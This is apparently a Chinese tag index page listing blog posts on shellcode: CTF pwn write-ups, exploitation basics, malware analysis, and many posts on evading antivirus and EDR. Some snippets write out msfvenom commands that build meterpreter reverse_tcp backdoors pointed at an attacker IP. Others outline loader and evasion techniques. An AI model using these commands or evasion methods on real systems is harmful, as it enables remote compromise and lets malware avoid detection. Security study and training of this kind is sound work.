Shellcode

漏洞基础知识

栈溢出栈溢出是缓冲区溢出的一种,往往由于对缓冲区的长度没有判断,导致缓冲区的大小超过了预定的大小,导致在栈内的保存的返回地址被覆盖,这时候返回地址将指向未知的位置.造成访问异常的错误.而当我们精心构造一段shellcode
黄一113530·2023-11-16 08:33

【渗透实战】木马免杀

先看效果(文中附源码)思路1.shellcode自身免杀首先cs生成一个bin文件再没有二开的情况下落地就会死那么如何处理呢?
渗透测试老鸟-九青·2023-11-15 03:09

红队系列-shellcode AV evasion免杀合集

shellcode免杀一些概念shellcodeEDR了解国内360全家桶360核晶引擎火绒腾讯电脑管家安全狗金山毒霸瑞星国外WindwosDefenerKaspersky卡巴斯基ESETNod32NortonMcAfeeAVASTAVG
amingMM·2023-11-13 22:01

[安卓逆向]IDA Pro的认识及使用

]IDAPro的认识及使用软件介绍IDAPro全称是交互式反汇编器专业版,人们其简称为IDA,IDApro是业界最成熟、先进的反汇编工具之一,是目前最棒的一个静态反编译软件,为众多0day世界的成员和ShellCode
yirj·2023-11-13 08:35

docker webdav_【技术分享】利用WebDAV特性建立隐蔽后门

200RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿前言——隐蔽后门的设计与需求我最近一直想为Windows系统设计一个隐蔽后门,主要功能是:传递各种恶意的payloads(shellcode
大咖岛创业交流群·2023-11-13 00:15

AV/EDR 免杀逃避技术汇总

目录1.shellcode加密2.降低程序的熵值逃离本地沙箱导入表混淆禁用ETW避免“恶意API调用模式”直接调用系统函数,规避“系统调用hook”删除或覆盖ntdll里面的hook欺骗线程调用堆栈(hooksleep
菜鸟m号·2023-11-13 00:08

二进制基础

pwn,那就要补一些那少得可怜的底层基础啦先学几个单词:exploit:用于攻击的脚本与方案payload:攻击载荷,是目标进程被劫持控制流的数据(精心构造的恶意数据,目标进程执行后就会触发这个漏洞)shellcode
晴空对晚照·2023-11-12 15:16

信息安全领域有哪些非常棒的资源?

在线资源:渗透测试资源:MetasploitUnleashed链接地址-免费攻防安全metasploita课程PTES链接地址-渗透测试执行标准OWASP链接地址-开源Web应用安全项目Shellcode
dechen6073·2023-11-12 03:32

信息安全相关资源

渗透测试资源MetasploitUnleashed链接地址-免费攻防安全metasploita课程PTES链接地址-渗透测试执行标准OWASP链接地址-开源Web应用安全项目Shellcode开发:ShellcodeTutorials
abg49988·2023-11-12 03:01

一例phorpiex僵尸网络样本分析

该样本首先在内存中通过两次解密释放出一段shellcodeshellcode又解密了一个pe,使用个PE替换掉当前进程内存,最后跳转到该PE入口点执行。
~巴哥~·2023-11-08 14:08

浅析本机API

创建时间:2005-03-09文章属性:转载文章提交:cisocker(cisocker_at_163.com)bysunwear[E.S.T]2004/10/02shellcode[email protected]此文只能说是一篇笔记
自由程序员·2023-11-06 03:21

【网络安全】Metasploit生成的Shellcode的导入函数解析以及执行流程分析(2)

密码破解的利器——彩虹表(rainbowtable)确定shellcode依赖于哪些导入将使研究人员进一步了解其其余逻辑。
H_00c8·2023-11-05 10:41

木马免杀(篇三)静态免杀方法

紧接上一篇,是通过cs生成shellcode并直接用python调用动态链接库执行shellcode。生成后的exe文件未进行任何处理。现在学习一些可以绕过静态免杀的方法。
Goodric·2023-10-31 19:51

NewStarCTFWEEK1部分题解

NewStarCTFWEEK1pwnret2text:calc:ret2libc:ret2shellcode:fallw1nd’sgift:REHello_Reverse:Baby_Re:CRYPTO:
Nq0inaen·2023-10-31 01:57

nim-lang callback uuid shellcode

0x00描述Nim(最初叫Nimrod)是⼀⻔命令式静态类型编程语⾔,可以被编译成C或JavaScript。它是开源的,维护很活跃,还结合了来⾃成熟语⾔(如Python,Ada和Modula)的成功概念。Nim具有⾼效性,⽣成的执⾏⽂件⼩,编译器⽀持所有平台,⾮常适合嵌⼊式硬实时系统,⽀持各种后端编译等等,Nim强⼤的宏系统和独⽴性,接下来将介绍如何利⽤Nim结合⼀些未被⼤规模滥⽤的winapi进
Lucifer1993·2023-10-30 03:48

恶意代码分析工具集

Cherishao/Analysis-Tools](https://github.com/Cherishao/Analysis-Tools))文档分析工具JavaScript分析工具系统&文件监视工具shellcode
mi-key·2023-10-29 02:54

Shellcode——绕过31

遇到了一道ctf题目,要求shellcode的每一个字节都必须大于31。如果没有这个限制的话:这是最方便的了。
we have a whole life·2023-10-27 00:18

MoeCTF2023_Pwn

文章目录MoeCTF2023_Pwn入门指北test_ncbaby_calculatorfdint_overflowret2text_32ret2text_64shellcode_level0shellcode_level1uninitialized_keyformat_level0PIE_enabledret2libcret2syscallshellcode_level2uninitialize
m0_75094067·2023-10-26 01:30

一篇文章彻底清楚shellcode(精品)

shellcode知识汇总文章目录shellcode知识汇总1.没开沙箱(此时我们可以系统调用getshell)(一)32位程序系统调用picoctf_2018_shellcode(二)64位程序系统调用
Leee333·2023-10-24 07:53

Windows Shellcode开发[3]

0前言及编写shellcode准备工作在WindowsShellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode
Sin hx·2023-10-24 07:23

Shellcode

shellcode简介shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。
星辞归野·2023-10-24 07:23

ELF文件注入shellcode原理与实现

介绍代码注入(英语:Codeinjection)是一种肇因于处理非法资料的电脑臭虫应用。代码注入可被攻击者用来导入代码到某特定的计算机程序,以改变程序的运行进程或目的。代码注入攻击的结果可以是灾难性的。可执行与可链接格式(英语:ExecutableandLinkableFormat,缩写为ELF),常被称为ELF格式,在计算机科学中,是一种用于可执行文件、目标文件、共享库和核心转储(coredum
哆啦安全·2023-10-24 07:22

shellcode教程从新手到高手

P3nro5e·2014/12/0811:320x00介绍与工具安装在这个站点中的这套教程目的在于利用汇编代码来生成自己的shellcode,它将有希望地被包含在"ProjectShellcodeDevelopmentFramework
weixin_34040079·2023-10-24 07:22

c语言让BSS段可输入执行shellcode

#include#include#include#includecharshellcode[800];voidvulnerable(){mprotect(0x404000,0x1000,PROT_READ
fjh1997·2023-10-23 21:11

evilhiding:一款好用的shellcode免杀工具

文章目录evilhiding工具浅析项目地址用法免杀测试声明evilhidingshellcodeloader,bypassav,免杀工具,一款基于python的shellcode免杀加载器工具浅析远控条件触发防沙箱花指令干扰
coleak·2023-10-23 05:22

python免杀初探

evilhiding项目地址免杀方式修改加载器花指令混淆loader源码修改签名加壳远程条件触发修改ico的md5加密loader基础知识loaderimportctypes#(kali生成payload存放位置)shellcode
coleak·2023-10-23 05:21

[0xGame 2023 公开赛道] week3

PWNedit-shellcode-runtime可以输入shellcode然后执行,但是禁用了\x0f\x05(syscall,箭头处),这里需要用前边的程序把这个syscall弄出来。
石氏是时试·2023-10-22 05:38

CVE-2019-9766漏洞实战

1.利用msf生成反向连接的shellcode2.构造具有反弹shell的MP3文件将上一步标记的部分替换脚本中的shellcode3.运行脚本,生成恶意mp3文件4.msf设置监听并运行exploit5
儒道易行·2023-10-21 20:22

msf生成linux shellcode,使用MSF打造各种ShellCode

生成各种后门Windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-fexe-opayload.exeLinux:msfvenom-ax86--platformLinux-plinux/x8
weixin_39866419·2023-10-20 03:10

Kali Linux学习笔记—Windows缓冲区溢出攻击

PASS命令接收到大量数据时是否会溢出02.py3.精确定位EIP中存放的是第几个字符03.py4.精确定位唯一字符串法04.py5.精确修改—发送A*2606+B*4+C*2005.py6.寻找可存放shellcode
江河湖海:D·2023-10-19 02:09

CS 4.7 Stager 逆向及 Shellcode

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,但是go编译的也有很多问题,加载起来会有很多受限的地方,所以想着能不能用C去重写一个,不过beacon的功能很多,短时间去重写有点费劲,所以想先重写CS的stager部分,并能转化成shellcod
喜欢蹲局子的小猿同学·2023-10-17 23:54

CS 4.7 Stager 逆向及 Shellcode 重写4

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,但是go编译的也有很多问题,加载起来会有很多受限的地方,所以想着能不能用C去重写一个,不过beacon的功能很多,短时间去重写有点费劲,所以想先重写CS的stager部分,并能转化成shellcod
喜欢蹲局子的小猿同学·2023-10-17 23:53

Windows内核-远程CALL(劫持线程)

以劫持线程的方式实现远程CALL包括劫持原理,代码实现获取主线程挂起线程函数定位恢复线程函数定位获取当前线程RIP构建shellcode劫持RIP及修复返回地址测试DNF喇叭公告对游戏安全感兴趣人群学习地址
游戏逆向·2023-10-14 21:28

[BUUCTF]PWN——jarvisoj_level1

习惯性的检索程序里的字符串,没有发现可以直接利用的gates,main函数开始看程序function函数参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们由于没有开启nx,所以我们可以先通过read读入shellcode
Angel~Yan·2023-10-14 20:24

七天学习Go语言-从0到0.01

前言:(不喜欢的跳过)最近,准确的说近几年来Go语言就一直都是一个十分热门的语言,特别是对于安全圈,其实用python的脚本的一直都高过于go脚本,不过近些来也有很多奇奇怪怪的面试官喜欢问,go语言免杀shellcode
vlan911·2023-10-13 04:47

python加载shellcode免杀

1、第一个shellcode加载器importctypes#msf生成的shellcode,命令:msfvenom-ex64/xor_dynamic-i16-pwindows/x64/meterpreter_reverse_tcplhost
ctostm·2023-10-13 00:27

NewStarCTF 公开赛wp

NewStarCTF公开赛wpret2textcalcret2libcret2shellcoderet2text这里有个栈溢出,话不多说,上脚本。
thna0s·2023-10-10 22:46

Shellcode免杀,过360、火绒、windows-Defender

shellcode简介Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段
刘—手·2023-10-07 18:04

ret2syscall

stackoverflow/basic-rop-zh/checksec,查看程序保护机制,开了NXida,main函数,f5gets函数,存在栈溢出,先算一下偏移量为112发现nosystemandnoshellcode
y1deer·2023-10-05 01:08

0day 第10章--10.4节:攻击异常处理突破GS(2)

将SHE句柄覆盖为shellcode地址即可。
Angelki·2023-10-04 20:30

0day 第10章--10.4节:攻击异常处理突破GS(1)

将SHE句柄覆盖为shellcode地址即可。实验环境:Winxpsp3vs2010Release版本、禁用优化根据网上把safeseh关闭了,但是没用。。。
Angelki·2023-10-04 20:59

Linux pwn入门教程(2)——shellcode的使用,原理与变形

作者:Tangerine@SAINTSEC0×00shellcode的使用在上一篇文章中我们学习了怎么使用栈溢出劫持程序的执行流程。为了减少难度,演示和作业题程序里都带有很明显的后门。
张悠悠66·2023-10-04 15:12

ret2shellcode 的泄露puts@got表

disassemblemain获取read@plt地址0x4005000x000000000040067e:call0x400500disassemble0x400500地址发现[email protected]会执行jmp指令jmp到的其实这是plt表对应函数的got表查看jmp地址的内存内容x/20gx0x601028发现[email protected]保存了read函数的blic中的地址callread—>r
wing_7·2023-10-04 14:41

【pwn】记一道shellcode侧信道攻击

【pwn】记一道shellcode侧信道攻击前言契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊!
woodwhale·2023-10-04 14:10

利用ret2libc绕过DEP安全机制

栈空间也被操作系统设置了不可执行属性,因此注入的Shellcode就无法执行了导向系统库函数执行(ret2libc)攻击方法:系统函数库(Linux称为glibc)有个s
_well_s·2023-10-04 14:37

栈溢出学习(二)之 jmp esp & return2libc

前言栈溢出学习(二),讲述jmpesp&&return2libc原理及其实践方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp&return2libc
Pz_mstr·2023-10-04 14:06

PWN ret2text

0X01什么是ROPROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。
prettyX·2023-10-04 14:36

linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad

文章目录Whatisret2syscallpwn题思路例题保护机制写payload打开flag读取flag写到输出中生成shellcode开始做题调用read(0,mem,0x1000)把我们真正的shellcode
azraelxuemo·2023-10-04 14:05

PWN入门系列(3)ROP的利用

ret2shellcode原理ret2shellcode,即控制程序shellcode代码。
二进制菜鸟K1rito·2023-10-04 14:05

【PWN · ret2shellcode | “jmp esp“】[i春秋]ret2shellcode

当溢出长度不足时,如何将shellcode放入padding位值,并执行呢?
Mr_Fmnwon·2023-10-04 14:34
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他